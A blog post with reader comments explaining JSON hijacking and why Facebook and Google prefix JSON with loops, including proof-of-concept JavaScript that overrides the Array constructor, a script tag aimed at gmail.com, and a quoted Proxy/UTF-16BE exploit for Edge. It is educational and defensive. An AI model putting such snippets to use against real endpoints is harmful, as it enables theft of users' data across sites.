Antony Garand

Posted on Nov 13, 2018 • Edited on Jul 7, 2020

Why Facebook's API starts with a for loop

#security #javascript

If you have ever inspected your requests to big companies' APIs in the browser, you might have noticed some weird JavaScript before the JSON itself:

(Screenshots of Facebook and Gmail API responses)

Why would they spend a few bytes to invalidate this JSON?

To protect your data

Without those important bytes, it could be possible for any website to access this data.

This vulnerability is called JSON hijacking, and it allows websites to extract the JSON data from those APIs.

Origins

In JavaScript 1.5 and earlier versions, it was possible to override the constructor of built-in objects such as Array, and have the overridden version called when creating arrays with bracket notation.

This means you could do:

function Array(){
    alert('You created an array!');
}
var x = [1,2,3];

And the alert would pop up!

Replace the var x line with the following script tag, and the attacker could read your emails!

This works because the Array constructor is overridden before the external script is loaded.

<script src="https://gmail.com/messages"></script>

Data extraction

Even though you're overriding the constructor, the array is still constructed, and you can still access it through the this keyword inside your function.

Here is a snippet which will alert all of the array data:

function Array() {
  var that = this;
  var index = 0;
  // Populating the array with setters, which dump the value when called
  var valueExtractor = function(value) {
    // Alert the value
    alert(value);
    // Set the next index to use this method as well
    that.__defineSetter__(index.toString(),valueExtractor );
    index++;
  };
  // Set the setter for item 0
  that.__defineSetter__(index.toString(),valueExtractor );
  index++;
}

Upon creating arrays, their values will be alerted!

This was fixed in the ECMAScript 4 proposal: array and object literals must use the built-in constructors, so redefining the global Object or Array no longer affects them.

Even though ES4 was never released, this vulnerability was fixed by major browsers soon after its discovery.

You can still get similar behavior in today's JavaScript, but only for arrays you create yourself, or for arrays created without bracket notation.

This would be the adapted version of the previous payload:

// Making an array
const x = [];

// Making the overwritten methods
x.copy = [];
const extractor = (v) => {
    // Keeping the value in a different array
    x.copy.push(v);
    // Setting the extractor for the next value
    const currentIndex = x.copy.length;
    x.__defineSetter__(currentIndex, extractor);
    x.__defineGetter__(currentIndex, ()=>x.copy[currentIndex]);
    // Logging the value
    console.log('Extracted value', v);
};

// Assigning the setter on index 0 
x.__defineSetter__(0, extractor);
x.__defineGetter__(0, ()=>x.copy[0]);


// Using the array as usual

x[0] = 'zero';
x[1] = 'one';

console.log(x[0]);
console.log(x[1]);

And this would be a version that calls Array as a function to create your array:

function Array(){
    console.log(arguments);
}

Array("secret","values");

As you can see, the values passed to Array were logged! Note that this version returns nothing, so a real payload would also need to return an actual array to keep the page working.

The fix was not to prevent defining a function named Array, but to force array literals to use the native implementation instead of your custom function.

This means we can still create an Array function, but it won't be called for array literals such as [1,2,3].

It will still be called for x = new Array(1,2,3) or x = Array(1,2,3), but JSON never uses that form, so this doesn't enable JSON hijacking.
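The difference can be observed in any modern engine. This sketch declares Array inside a function so it only shadows the global locally; the names demo, logged and NativeArray are illustrative. The interceptor logs its arguments and then delegates to the built-in, so callers still get a real array back.

```javascript
// Keep a handle on the real constructor before shadowing it.
const NativeArray = globalThis.Array;
const logged = [];

function demo() {
  // Hypothetical interceptor: a local function named Array that logs its
  // arguments, then delegates to the built-in so callers get a real array.
  function Array(...items) {
    logged.push(items);
    return NativeArray(...items);
  }

  const fromLiteral = [1, 2, 3];              // literal: native Array, not logged
  const fromCall = Array('secret', 'values'); // call: goes through our function
  return { fromLiteral, fromCall };
}

const result = demo();
console.log(logged.length); // 1, only the Array(...) call was intercepted
console.log(NativeArray.isArray(result.fromLiteral)); // true
```

This is exactly why the fix closes JSON hijacking: a JSON response only ever contains literals, which never reach the user-defined function.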

Modern variations

Alright, so we know old browsers were vulnerable.
What does this mean for us today?

Well, with the recent release of ECMAScript 6, new juicy features such as Proxies were added!

Gareth Heyes from PortSwigger blogged about a modern variation of this attack, which still lets us steal data from JSON endpoints!

Using Proxies instead of accessors lets us intercept any variable lookup, no matter what its name is.
A proxy behaves like an accessor, but for every property that is read or written.
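Here is a minimal illustration of that property outside any browser: a Proxy's traps receive every property name that is looked up, whatever it is. The names seen and spy are illustrative; in Heyes's attack the proxy sits on the global object's prototype chain rather than being queried directly.

```javascript
const seen = [];

const spy = new Proxy({}, {
  // Called for `name in spy`, and for identifier lookups that reach the
  // proxy through the global object's prototype chain (what the PoC sets up).
  has(target, name) {
    seen.push(name);
    return false;
  },
  // Called for ordinary property reads such as spy.anything
  get(target, name) {
    seen.push(name);
    return undefined;
  },
});

'supersecret' in spy;
spy.anotherName;
console.log(seen); // holds 'supersecret' and 'anotherName'
```

Neither name was declared anywhere, yet both were captured, which is what makes a proxy more powerful than per-index setters.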

Using this and another quirk, it is possible to steal data once again!

UTF-16BE is a multi-byte charset and so two bytes will actually form one character. If for example your script starts with [" this will be treated as the character 0x5b22 not 0x5b 0x22. 0x5b22 happens to be a valid JavaScript variable =). Can you see where this is going?

Using such a script:

<script charset="UTF-16BE" src="external-script-with-array-literal"></script>

With a bit of attacker-controlled data in this response, plus a small bit-shifting function to make the names legible again, we can exfiltrate data once again!
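The byte pairing and the bit-shifting recovery can be simulated without a browser. This sketch assumes plain ASCII input; misreadAsUtf16be is a hypothetical helper that mimics what a UTF-16BE decoder does to those bytes, and recover uses the same c>>8 and c&0xff arithmetic as the PoC below.

```javascript
// Hypothetical helper: pair up ASCII bytes the way a UTF-16BE decoder would,
// high byte first, so two characters become one code unit.
function misreadAsUtf16be(ascii) {
  let decoded = '';
  for (let i = 0; i < ascii.length; i += 2) {
    const high = ascii.charCodeAt(i);
    // Assumption for this sketch: pad an odd trailing byte with 0x00
    const low = i + 1 < ascii.length ? ascii.charCodeAt(i + 1) : 0;
    decoded += String.fromCharCode((high << 8) | low);
  }
  return decoded;
}

// Split every code unit back into its two original bytes.
function recover(name) {
  return name.replace(/./g, (c) => {
    const code = c.charCodeAt(0);
    return String.fromCharCode(code >> 8, code & 0xff);
  });
}

const garbled = misreadAsUtf16be('["supersecret"');
console.log(garbled.charCodeAt(0).toString(16)); // 5b22
console.log(recover(garbled)); // ["supersecret"
```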

Here is his final PoC for Edge, taken from his blog post:

<!doctype HTML>
<script>
Object.setPrototypeOf(__proto__,new Proxy(__proto__,{
    has:function(target,name){
        alert(name.replace(/./g,function(c){ c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff); }));
    }
}));
</script>
<script charset="UTF-16BE" src="external-script-with-array-literal"></script>
<!-- script contains the following response: ["supersecret","<?php echo chr(0)?>aa"] -->

Since I won't explain his method in depth, I strongly suggest reading his post for more information.

Prevention

Here are the official OWASP recommendations, taken from their AJAX Security Cheat Sheet:

Use CSRF protection
This prevents the exploit by not returning the data if a security header or CSRF token is missing.
Always return JSON with an object on the outside
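Both recommendations can be sketched on the server side. This is a minimal, framework-free sketch: handleApiRequest, the x-csrf-token header name and the { data: ... } wrapper are assumptions for illustration, not OWASP's code.

```javascript
// Hypothetical handler: headers is a plain object of lowercase header names,
// sessionToken is the token issued to the user's session.
function handleApiRequest(headers, sessionToken, payload) {
  // 1. CSRF protection: a plain <script src> request cannot add custom
  //    headers, so a missing or wrong token means no data is returned.
  if (!sessionToken || headers['x-csrf-token'] !== sessionToken) {
    return { status: 403, body: '' };
  }
  // 2. Always put an object on the outside, never a bare array.
  return { status: 200, body: JSON.stringify({ data: payload }) };
}

console.log(handleApiRequest({}, 'tok123', ['mail']).status); // 403
console.log(handleApiRequest({ 'x-csrf-token': 'tok123' }, 'tok123', ['mail']).body); // {"data":["mail"]}
```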

The second recommendation, returning an object on the outside, is interesting.

In Firefox and IE, this is valid:

x = [{"key":"value"}]
x = {"key":"value"}
[{"key":"value"}]
{key: "value"}

But this isn't:

{"key":"value"}

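It is not valid because browsers treat the opening curly brace as the start of a block statement, not an object literal. Inside that block, the quoted "key" is just a string expression, and the colon that follows it is a syntax error.
The unquoted notation, {key: "value"}, parses as a block containing a labeled statement: key is the label and "value" is the statement it labels.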

[See edit: This is wrong] Chrome, unlike the others, considers those cases to be an object creation, and therefore it creates a new object.

Thanks Matt (r0x33d) for the help demystifying this!

Update: Mathias Bynens from the V8 team pointed this out:

But the DevTools implicitly wrap your input code to make this work.

This can be tested by passing the code to eval instead of typing it directly into the console:

eval('{"x":"y"}');

This throws the same SyntaxError in all browsers.

Chrome therefore handles this input correctly inside a script tag, even though the DevTools console may behave differently.
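The parse results discussed above can also be reproduced outside the DevTools console. A minimal sketch, assuming Node.js or a page where new Function is permitted (a strict Content Security Policy would block it); parsesAsScript is a hypothetical helper name. new Function compiles the source without running it, so nothing in the response is executed.

```javascript
// Returns true if the source is syntactically valid as a statement list.
function parsesAsScript(source) {
  try {
    new Function(source); // compile only, never called
    return true;
  } catch (err) {
    if (err instanceof SyntaxError) return false;
    throw err;
  }
}

console.log(parsesAsScript('[{"key":"value"}]')); // true: array literal
console.log(parsesAsScript('{key: "value"}'));    // true: block with a labeled statement
console.log(parsesAsScript('{"key":"value"}'));   // false: string followed by a colon
```

A response that fails to parse never runs at all, so there is nothing for an overridden constructor or proxy to observe.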

Conclusion

While those vectors may not work today, we never know what new bug tomorrow will bring, so we should still do our best to keep our APIs from being exploitable.
If we had taken this Stack Overflow answer for granted, we would have been vulnerable to the modern variants, and possibly still hacked.

Google and Facebook's answer has been to add invalid JavaScript or infinite loops before their JSON data, but there are a few other alternatives, as listed by OWASP.
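The legitimate page reads the body as a string (for example with fetch or XHR), so it can remove the prefix before calling JSON.parse. A minimal sketch, assuming a for (;;); prefix like the one in the title; encodeResponse and decodeResponse are illustrative names, not Facebook's or Google's actual code.

```javascript
// Assumed prefix: an infinite loop that breaks script-tag inclusion.
const PREFIX = 'for (;;);';

// Server side: make the body useless (or endless) when loaded as a script.
function encodeResponse(data) {
  return PREFIX + JSON.stringify(data);
}

// Client side: strip the prefix from the raw text, then parse the rest.
function decodeResponse(text) {
  if (!text.startsWith(PREFIX)) {
    throw new Error('Unexpected response prefix');
  }
  return JSON.parse(text.slice(PREFIX.length));
}

const body = encodeResponse({ messages: ['hello'] });
console.log(body); // for (;;);{"messages":["hello"]}
console.log(decodeResponse(body).messages[0]); // hello
```

An attacker using a script tag cannot strip anything, because the browser executes (or rejects) the whole body before any of their code sees it.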

References:

Haacked.com - JSON Hijacking

Stack Overflow - Why does Google prepend [a loop] to their JSON responses

PortSwigger - JSON hijacking for the modern web

Gareth Heyes - slides

Top comments (39)

Ben Halpern • Nov 13 '18

This is incredibly illuminating. Thank you so much for this Antony!

raphipsp • Nov 14 '18

Replace var x with an html script tag?
But how?

Antony Garand • Nov 14 '18

In your webpage, you would do the following:

<script>
function Array(){
    alert('You created an array!');
}
</script>
<script src="https://gmail.com/messages"></script>

This way you overload the constructor before loading the messages themselves.

raphipsp • Nov 14 '18

Ah ok, I see.
I think the way it is written in the article is confusing. It should instead say "override the Array constructor before loading external scripts"

Antony Garand • Nov 14 '18

Thanks for the feedback, updated the post so it's more clear

raphipsp • Nov 14 '18

Wow you're fast!

Beni Cherniavsky-Paskin • Nov 20 '18

Is this all only to protect people that misuse eval() to parse JSON? JSON.parse() has never been affected by any of this, right?

Hmm, the article gives example of malicious site loading the JSON API directly with a script tag: <script src="https://gmail.com/messages"></script>.
So here's where I'm confused:

Why would a different site have authentication to get answers from the API using a script tag?
If it works with a script tag and hacks to extract data from evaluating JSON as JS, why won't it work anyway with an AJAX request, parsing the result however you want?

Is this because script tags are historically lax about same-origin policies? I knew evil.example.com can include a script tag for gmail.com, but does that also give such request access to gmail.com cookies?!?

Alex Lohr • Nov 20 '18

A script tag will basically send the same request that would be sent if the URL itself were loaded in the browser: if the browser has cookies saved for the URL, they will be sent, and thus authentication cookies can be validated successfully.
Because the browser won't let the page read a cross-origin AJAX response unless the server sets the correct Cross-Origin Resource Sharing (CORS) headers, you won't get the result.

While it is absolutely possible to implement a strict security layer on an API server, this will also increase the CPU/memory/bandwidth requirements. If you have a really big service such as gmail, you'd rather do as much security as possible on the front-end level.

Miff • Nov 13 '18

I'm really wondering how any of these attack techniques would fare against simpler CSRF techniques like double-submitted cookies.

Other stupid ways that seem like they could mitigate this would be to just make all the JSON endpoints require a POST, or to use a different method of encoding data that can't be interpreted as valid Javascript at all (XML?)

Nathan Johnson • Nov 15 '18

Making them all POST wouldn't be semantic (POST means you're changing something on the server). JSON is the standard API data format now, and it's much better than XML in my opinion.

The ultimate way to prevent these attacks is to not allow user submitted input to end up anywhere in output unescaped so attackers' scripts are never able to be injected.

Richard Tallent • Dec 9 '18

No one cares about semantic verbs. Using POST for API endpoints solves an entire class of link-based attacks. We should of course still use CSRF and other mitigations, but the semantic purism argument is a weak one, IMHO.

Guney Ozsan • Nov 23 '18

Not POST, but using header authentication on all endpoints can add a layer of security. But this is extra. Nathan's point is well made.

Joshua Arnott • Nov 14 '18 • Edited

I can see how adding an infinite for-loop at the start of the JSON response would prevent it from being executed as JavaScript. How does the original site access the data? Does it need to use a function to discard the first X bytes of every response before loading the JSON? Or is there something I'm missing?

Antony Garand • Nov 14 '18

This is exactly it!

As they load the JSON as a string, they can remove their JS-breaking prefix before parsing it.

Michael Z • Jan 28 '21

While those vectors may not be working today, we never know what new bug tomorrow will bring, and therefore we should still do our best to prevent API's from being exploitable.

Wouldn't CORB prevent JSON hijacking in modern browsers? developers.google.com/web/updates/...

Manda Putra • Nov 19 '18

I just follow along with your articles with the dev tools open haha

Davis • Dec 26 '18

TLDR: use auth headers instead of cookies in your API, and don't use script tags to call an API?? We shouldn't be looking at the hacks that giants use, and should instead use actual security improvements. CSP headers!